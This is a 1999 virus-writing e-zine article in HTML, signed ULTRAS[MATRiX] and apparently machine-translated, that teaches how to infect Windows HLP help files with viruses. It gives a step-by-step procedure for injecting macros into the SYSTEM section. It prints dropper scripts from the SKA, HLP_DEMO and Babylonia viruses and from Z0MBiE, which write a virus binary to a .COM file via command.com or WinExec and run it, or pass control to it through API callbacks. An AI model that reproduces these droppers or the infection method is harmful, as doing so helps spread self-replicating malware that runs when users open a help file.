<html>

<head>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
<title>HLP infection</title>
</head>

<body bgcolor="#FFFFFF" text="#000000">

<p align="left"><img src="hlp.gif" alt="HLP" width="352" height="22"><small><font
face="Verdana"><small><br>
<br>
In this clause I shall tell about infection HLP of files. Infection HLP of files Was used
in a virus SKA, HLP_DEMO, Babylonia and I have decided to describe this method infected
detailed.<br>
<br>
The HLP-files can comprise the subroutines written on special Script-language (macros).
Used in HLP-script language allows to create on Disk files and to start them on
performance. The data script automatically are carried out handler of HLP-files (utility
WinHelp) at their opening. In HLP files is divided on some section, us will be interesting
only SYSTEM The section in which is possible will to write down the virus. Scripts in HLP
files are coded and are packed not complex(difficult) LZ77 by algorithm.<br>
Arrangement of the catalogue of pages (section) first byte of heading - 2Fh this heading
to us is not so necessary but on displacement 37h Concerning him(it) we find catalogue. So
us will interesting section SYSTEM in which are written down large in the information
Structure hlp of a file, language using in operational system and icon and <br>
everyone shit used in hlp files.<br>
<br>
[ <font color="#FF0000">Infection</font> ]<br>
<br>
To infect hlp files two ways first which are possible was used in SKA a virus and the
second method which was used HLP.DEMO. The first method more approaches<br>
for DOS of viruses and second for Win32 of platforms. Below I shall bring examples and I
shall describe them. So stage by stage that we should make to infect HLP files.<br>
<br>
1. Read begin of HLP-dir<br>
2. Find &quot;|SYSTEM&quot; string<br>
3. Read SYSTEM macros<br>
4. Check hlp file already infected?<br>
5. Generate our macros<br>
6. Correct SYSTEM lenght<br>
7. Write scriptmacro header+our scriptmacro in the end of module<br>
8. Rewrite SYSTEM section<br>
9. Write &amp; correct hlp_header<br>
10. Create &amp; write on SYSTEM macros virus dropper on eof<br>
11. Write hlp_dir with correct &quot;SYSTEM&quot; macros<br>
<br>
<br>
[ <font color="#FF0000">Virus Script - Macro Dropper</font> ]<br>
<br>
So most important detail hlp of a virus it virus script (dropper), having read <br>
the description hlp of a format and it is a little about hlp macros I shall tell<br>
and I shall describe with what dropper was used in SKA, HLP_DEMO, Babylonia <br>
viruses.<br>
<br>
And so an example virus script SKA:<br>
<br>
IF(NOT(FE(`C:\\NTLDR.')),`RR(&quot;KERNEL32&quot;,&quot;Sleep&quot;,&quot;U&quot;)')<br>
IF(NOT(FE(`C:\\NTLDR.')),`EF(`COMMAND.COM',&quot;,'&quot;/CECHO ??????????
&gt;C:\\\?????.COM&quot;,0)')<br>
IF(NOT(FE(`C:\\NTLDR.')),`Sleep(550)')<br>
IF(NOT(FE(`C:\\NTLDR.')),`EF(`COMMAND.COM',&quot;,'&quot;/CECHO ??????????
&gt;C:\\\\?????.COM&quot;,0)')<br>
IF(NOT(FE(`C:\\NTLDR.')),`Sleep(550)')<br>
IF(NOT(FE(`C:\\NTLDR.')),`EF(`COMMAND.COM',&quot;,'&quot;/CECHO ??????????
&gt;C:\\\\?????.COM&quot;,0)')<br>
IF(NOT(FE(`C:\\NTLDR.')),`Sleep(550)')<br>
IF(NOT(FE(`C:\\NTLDR.')),`EF(`COMMAND.COM',&quot;,'&quot;/CECHO ??????????
&gt;C:\\\\?????.COM&quot;,0)')<br>
IF(NOT(FE(`C:\\NTLDR.')),`Sleep(550)')<br>
IF(NOT(FE(`C:\\NTLDR.')),`EF(`C:\\\\CFBEY.COM',qchPath,0)')<br>
<br>
And now I shall describe under the order work it script from a virus SKA:<br>
<br>
The virus Win95. SK causes command.com and with the help of a team echo and creates a file
with a copy of a virus, which then starts. The name of a file and his(its) polymorphic
contents gets out casually at infection next HLP it is necessary in hlp of infections.
Lacks of this method of that that the window command.com and it is caused to become
visible for the user.<br>
<br>
IF(NOT(FE(`C:\\NTLDR.'))<br>
In this procedure script checks if to system of a file C:\NTLDR (loader WindowsNT), it is
necessary that a virus Was not started in WinNT.<br>
<br>
`RR(&quot;KERNEL32&quot;,&quot;Sleep&quot;,&quot;U&quot;)'<br>
Imports function Sleep from kernel32.dll with parameter unsigned long int.<br>
<br>
IF(NOT(FE(`C:\\NTLDR.')),`EF(`COMMAND.COM',&quot;,'&quot;/CECHO ??????????
&gt;C:\\\\?????.COM&quot;,0)')<br>
It is function starts command.com and copies the virus in ????? .com <br>
where ?????.com - this generation name<br>
?????????? - virus binary<br>
<br>
IF(NOT(FE(`C:\\NTLDR.')),`EF(`C:\\\\?????.COM',qchPath,0)')<br>
It is function starts????? .com, qchPath a complete way to an open HLP-file<br>
<br>
And so an example virus script HLP_DEMO:<br>
<br>
RR(`uSeR32.dll',`MessageBoxA',`USSU')<br>
MessageBoxA(0,`Trying to infect',`HLP.Demo',0)<br>
RR(`kERnEL32.dLL',`EnumDateFormatsA',`SUU')<br>
EnumDateFormatsA(` ',2048,2)<br>
MessageBoxA(0,`Script comes to end!',`HLP.Demo',0)<br>
<br>
And now I shall describe work it script from a virus HLP_DEMO:<br>
It script more approaches for viruses under windoze platform, and lacks of this method is
not present, as it seems.<br>
<br>
RR(`uSeR32.dll',`MessageBoxA',`USSU')<br>
Imports function MessageBoxA from kernel32.dll with parameters.<br>
<br>
MessageBoxA(0,`Trying to infect',`HLP.Demo',0)<br>
We give out the message<br>
<br>
RR(`kERnEL32.dLL',`EnumDateFormatsA',`SUU')<br>
Imports function EnumDateFormatsA from kernel32.dll with parameters.<br>
<br>
EnumDateFormatsA(` ',2048,2)<br>
We cause this function and the management passes to our virus.<br>
<br>
MessageBoxA(0,`Script comes to end!',`HLP.Demo',0)<br>
We give out the message<br>
<br>
And so an example virus script Babylonia:<br>
~~~~~~~~~~~~~~~~~~~~~~~~~~~<br>
<br>
RR (&quot;USER32.DLL&quot;, &quot;EnumWindows&quot;, &quot;SU&quot;)<br>
&quot;EnumWindows (&quot;?????', 666)<br>
<br>
It seems that it is very good and convenient script for HLP of a virus..<br>
RR (&quot;USER32.DLL&quot;, &quot;EnumWindows&quot;, &quot;SU&quot;))<br>
Imports function EnumWindows from user32.dll with parameters.<br>
<br>
&quot;EnumWindows (&quot;?????', 666)<br>
We cause this function c in interesting parameter. (????? - virus binary)<br>
<br>
Another virus script by Z0MBiE<br>
~~~~~~~~~~~~~~~~~~~~<br>
<br>
RR(`KERNEL32.DLL',`CreateThread',`UUSUUS') <br>
CreateThread (0,0, &quot;????? ', 0,0, &quot;nnnn&quot;)<br>
<br>
It too very interesting method which has written z0mbie, but according to the author this
of a method has some lacks, But it can be used and it`s works. </small></font></small></p>

<p align="left"><small><small><font face="Verdana"><br>
RR(`KERNEL32.DLL',`CreateThread',`UUSUUS') <br>
Imports function CreateThread from kernel32.dll with parameters.<br>
<br>
CreateThread (0,0, &quot;????? ', 0,0, &quot;nnnn&quot;)<br>
We cause this function. (????? - virus binary)<br>
<br>
Another virus script by Z0MBiE<br>
~~~~~~~~~~~~~~~~~~~~<br>
<br>
RR (&quot; KERNEL32. DLL ', &quot;WinExec&quot;, &quot;SU&quot;)<br>
WinExec(`command.com /c echo????? &gt; sux.com ', 0)<br>
WinExec (&quot;sux.com&quot;, 0)<br>
WinExec(`command.com /c del sux.com ', 0)<br>
<br>
One more interesting method which too has written z0mbie, it(he) me seems more approaches
to multiplatform viruses but also for windoze platform it will work too without the
special problems.<br>
<br>
RR (&quot; KERNEL32. DLL ', &quot;WinExec&quot;, &quot;SU&quot;)<br>
Imports function WinExec from kernel32.dll with parameters.<br>
<br>
WinExec(`command.com /c echo ????? &gt; sux.com ', 0)<br>
Starts command.com with the help WinExec and copies the virus in sux.com <br>
????? - virus binary<br>
<br>
WinExec (&quot;sux.com&quot;, 0)<br>
Starts sux.com with the help WinExec<br>
<br>
WinExec(`command.com /c del sux.com ', 0)<br>
Let's remove a file sux.com <br>
<br>
So infection HLP of files it is possible to consider(count) very simply to write, it is
necessary only to write on better(better) polyengine good for hlp Infections. I not became
describe all teams which can to be used in HLP files but in the following release of a
e-zine. I plan to describe and to write hlp infection.<br>
<br>
ULTRAS[MATRiX]<br>
<br>
12/2/99</font></small></small></p>
</body>
</html>
